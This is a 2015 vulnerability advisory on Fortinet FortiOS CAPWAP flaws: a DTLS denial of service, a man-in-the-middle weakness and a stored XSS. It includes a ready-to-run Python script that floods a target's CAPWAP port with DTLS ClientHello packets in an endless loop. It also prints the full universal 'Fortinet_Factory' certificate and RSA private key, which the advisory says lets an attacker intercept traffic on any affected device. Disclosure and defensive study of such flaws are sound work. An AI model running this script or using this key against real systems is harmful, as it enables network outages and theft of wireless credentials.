(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

Fortinet FortiOS Multiple Vulnerabilities
Affected Versions: Verified on FortiOS Firmware v5.0,build4457 (GA Patch 7)

PDF:
http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiOS_Multiple_Vulnerabilities.pdf

+-------------+
| Description |
+-------------+
This advisory details multiple vulnerabilities found within the Fortinet
FortiOS software. FortiOS is a security-hardened, purpose-built Operating
System that is the foundation of all FortiGate network security platforms.

A denial of service vulnerability was discovered within the CAPWAP Daemon,
allowing an attacker to lock the CAPWAP Access Controller. This was achieved
by sending recurring DTLS messages to the daemon. The CAPWAP daemon itself was
found to suffer from a Man-In-The-Middle vulnerability, due to the nature of
Fortinet’s certificate practices. A Stored Cross Site Scripting vulnerability
was also discovered, allowing an attacker to send a crafted CAPWAP join
request containing malicious JavaScript code. This code is subsequently
rendered in the FortiOS administrative console.

+--------------+
| Exploitation |
+--------------+

--[ CAPWAP Daemon DTLS Denial of Service Vulnerability

During the DTLS session establishment, the protocol implements a
‘HelloVerifyRequest’ send back to the client in response to the initial
‘ClientHello’. The client is then required to send a ‘ClientHello’ with a
specific cookie provided in the ‘HelloVerifyRequest’. This is designed to
protect against Denial of Service attacks. It was discovered that, even though
the Fortinet DTLS server implements this, sending a number of initial
‘ClientHello’ requests in short succession creates a denial of service
condition on the FortiOS device.

The number of requests required to trigger the condition was found to be
dependent on the specifications of the machine running FortiOS, however this
was tested against a mid-range Fortigate device and successfully caused a
Denial of Service condition with as little as ten requests.

The following POC code can be used to replicate this vulnerability:

#!/usr/bin/python
#
# FortiOS CAPWAP Control Denial Of Service POC
# 
# This exploit will trigger a denial of service
# condition on the FortiOS CAPWAP Control Daemon
# by sending recurring DTLS Client Hello 
# messages.
#
# Author: Denis Andzakovic
# Date: 19/08/2014
#

import socket 
import os
import time
from struct import pack
import binascii
import argparse

# Grab parameters from command line
parser = argparse.ArgumentParser(description='FortiOS CAPWAP Control Server - DTLS Client Hello DOS')
parser.add_argument('-d','--host', help="IP Address of the host to attack", required=True)
args = parser.parse_args()

randombytes = os.urandom(28)
capwapreamble = "\x01\x00\x00\x00"
hello = "\x16" + "\xfe\xff" + "\x00"*8 #handshake id, version, epoch and seq
handshakeProtocol = "\x01" + "\x00\x00\x2c" + "\x00"*6 + "\x00\x2c" + "\xfe\xff" + pack(">i",int(time.time())) + randombytes + "\x00" + "\x00" + "\x00\x04" + "\x00\x2f\x00\x0a\x01\x00"

while True:
  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  sock.sendto(capwapreamble + hello + pack(">H",len(handshakeProtocol)) + handshakeProtocol, (args.host, 5246))
  resp, senderaddr = sock.recvfrom(4098)

  cookie = resp[31:]
  print "[+] Got response. Cookie: " + binascii.hexlify(cookie)

--[ DTLS Man-In-The-Middle Vulnerability

Fortinet devices were found to use DTLS for the CAPWAP control protocol, with
the CAPWAP data protocol being cleartext by default. The CAPWAP DTLS protocol
was found to use a universal ‘Fortinet_Factory’ certificate and private key,
the certificate authority for which is static across all Fortinet devices. A
method for replacing this certificate was not found.

By harvesting this certificate and key, an attacker may stage Man in the
Middle attacks against any Fortinet device using the CAPWAP DTLS protocol.
This allows for the retrieval of sensitive information such as wireless SSIDs
and WPA passphrases. The two files, ‘Fortinet_Factory.cer’ and
‘Fortinet_Factory.key’ can be found in the /etc/cert/local directory on
Fortinet devices.

The following details the ‘Fortinet_Factory’ certificate and private
key. By using the following certificate an attacker may stage
Man in the Middle attacks against any Fortinet access point or wireless
controller implementing the CAPWAP Control protocol globally.

-----BEGIN CERTIFICATE-----
MIIDRTCCAi2gAwIBAgIDAN9yMA0GCSqGSIb3DQEBBQUAMIGgMQswCQYDVQQGEwJV
UzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAGA1UEBxMJU3Vubnl2YWxlMREwDwYD
VQQKEwhGb3J0aW5ldDEeMBwGA1UECxMVQ2VydGlmaWNhdGUgQXV0aG9yaXR5MRAw
DgYDVQQDEwdzdXBwb3J0MSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QGZvcnRpbmV0
LmNvbTAeFw0xMTA1MjYyMzExMDVaFw0zODAxMTkwMzE0MDdaMIGdMQswCQYDVQQG
EwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAGA1UEBxMJU3Vubnl2YWxlMREw
DwYDVQQKEwhGb3J0aW5ldDESMBAGA1UECxMJRm9ydGlHYXRlMRkwFwYDVQQDExBG
VzYwQ0EzOTExMDAwMTA0MSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QGZvcnRpbmV0
LmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAxDcSsvApqw3AsPg4T/MX
eZrE2Vhj3DOGM5JNiOyp1YIt4Q0xVYB+1B3SKFEmkwjYJoMR0Q8sFnbblA81FRGR
sQVxRY+DPdJne+hTVbQ93BIhMGtNAoBYwygU6/JC1e3deB2XfgkBW70Esg12ghu2
lmTHOWrIMGgW+DnIGvsuYlkCAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0B
AQUFAAOCAQEAJtQ9XkyjPH9IoS9qRdxfrkvvn6MbikvPVc3IYa8eS69Etj3vlRVf
GEbEvNnYHBmT7ur77goa21ozqnfmImAstW3QOINkF/FX6VHbHlvywDJEortqEVgT
DlOCKPV4z91t4Yf3/v0LYmHEF056TqU5nXt3ipTTNeFgANdKCMj4mT1KG9U9XfoK
aAmcoe2JDGUj9W+5P0WMVcCth5mIJ5xy1UkEvWlG2p/p1Yw3fmbNkN5SJViy/Gug
yznUXeBwmQEwupwq1ZfAcXQyxTiW7DHhMXnXis0tSJlOLFQAtAs83V5Ox8MSmGE7
M94eb9JOP8cvH2bW6LW7egB/Bwrp4N421Q==
-----END CERTIFICATE-----

-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQDENxKy8CmrDcCw+DhP8xd5msTZWGPcM4Yzkk2I7KnVgi3hDTFV
gH7UHdIoUSaTCNgmgxHRDywWdtuUDzUVEZGxBXFFj4M90md76FNVtD3cEiEwa00C
gFjDKBTr8kLV7d14HZd+CQFbvQSyDXaCG7aWZMc5asgwaBb4Ocga+y5iWQIDAQAB
AoGAfV8/KGyCA1T3QVxpBtSptD6q9sEelW2qmzspJYsqfUz/qaP3WM2QvFINnUs0
3ZAyJHFtKeqK3hO1+6W34i1mq9lgAll7KMbAuxxmY8U87zskv9YUP46dONt+ondn
nVf5OxrPTH3Zkom1CEh110BUI4hD+rEqYi+twZF5FuAXVd0CQQDv0FYVO4NMzEL+
leLvkbd+ODUTvm9rET+mxtx719DJ3JL9T7jiunPsDY/0dpGkVSyLGQg6tO2YsgrE
/Vz79iO3AkEA0XVo1RkmFpoE0EZHMzkzjJFmoLEAYtLPvcg4IP6bIuAHWt54cxFB
/mpN4QlhVm0+awMPH3PNWjTJ9EDFp+5KbwJACu8IvbcU6W92rnzO9/VA1HRjlx7b
nZoPuN7gNpVEY6+20+3KlCvEFUMZCSBOy5tGiKD/iw2st4WGkCytDJ/QSQJBAJqq
cNuSM27TEiTdECxB28+7eiXELb3LXv0LgG7UsqeA981go16Mase7pYA7VfXkuwd3
/c3Cy+sFOe8zeQB0098CQFmiDnhpV37FtUzDXkKC5a9Vc950wK9/V9vHHwFIiO6K
0+GoDb6b2HmHGvIpBmw55isanRDlC1x1EpRKw/3F0+4=
-----END RSA PRIVATE KEY-----


--[ Stored Cross Site Scripting Vulnerability

By sending a crafted CAPWAP Join packet, a malicious entity may stage Cross
Site Scripting attacks against legitimate administrative users. This is
achieved by inserting malicious JavaScript code into the WTP Name or WTP
Active Software Version fields within the CAPWAP Join request. The WTP Active
Software Version field is a child parameter of the WTP Descriptor message
element.

+----------+
| Solution |
+----------+
There is no official solution for these issues. All Access Controller to
Wireless Termination Point (and vice-versa) traffic is recommended to be kept
on a secure network and rigorously firewalled to reduce the exploitability of
these vulnerabilities.

+---------------------+
| Disclosure Timeline |
+---------------------+
08/10/2014 -  Initial email sent to Fortinet PSIRT team.
09/10/2014 -  Advisory documents sent to Fortinet.
15/10/2014 -  Acknowledgement of advisories from Fortinet.
16/10/2014 -  Update requested from Fortinet.
02/12/2014 -  Update requested from Fortinet.
13/12/2014 -  Update requested from Fortinet.
29/01/2015 -  Advisory Release.

+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+

Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security 
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the 
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings, 
contact us:

Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650